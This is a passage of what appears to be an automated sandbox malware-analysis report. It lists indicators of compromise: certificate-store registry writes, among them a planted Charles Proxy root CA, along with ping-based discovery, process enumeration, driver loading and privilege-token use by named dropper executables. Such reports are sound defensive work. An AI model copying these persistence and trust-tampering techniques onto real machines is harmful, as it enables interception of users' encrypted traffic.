11330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

4356 regedit.exe
6396 regedit.exe
Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

3824 PING.EXE
2184 PING.EXE
4408 PING.EXE
804 PING.EXE
5852 PING.EXE
7108 PING.EXE
5264 PING.EXE

pid	process
4356	regedit.exe
6396	regedit.exe

pid	process
3824	PING.EXE
2184	PING.EXE
4408	PING.EXE
804	PING.EXE
5852	PING.EXE
7108	PING.EXE
5264	PING.EXE

Script User-Agent 10 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	109	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	180	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	432	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1630	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2888	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3876	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	105	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	200	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	206	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	435	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1615161422550.exe1615161424082.exekey.exemultitimer.exeC181.tmp.exeIBInstaller_97039.tmp

pid	process
4296	1615161422550.exe
4296	1615161422550.exe
4456	1615161424082.exe
4456	1615161424082.exe
1288	key.exe
1288	key.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
4160	multitimer.exe
3460	C181.tmp.exe
3460	C181.tmp.exe
5020	IBInstaller_97039.tmp
5020	IBInstaller_97039.tmp

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

app.exe

pid process

5012 app.exe

pid	process
5012	app.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	2292	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2292	msiexec.exe
Token: SeSecurityPrivilege	2200	msiexec.exe
Token: SeCreateTokenPrivilege	2292	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2292	msiexec.exe
Token: SeLockMemoryPrivilege	2292	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2292	msiexec.exe
Token: SeMachineAccountPrivilege	2292	msiexec.exe
Token: SeTcbPrivilege	2292	msiexec.exe
Token: SeSecurityPrivilege	2292	msiexec.exe
Token: SeTakeOwnershipPrivilege	2292	msiexec.exe
Token: SeLoadDriverPrivilege	2292	msiexec.exe
Token: SeSystemProfilePrivilege	2292	msiexec.exe
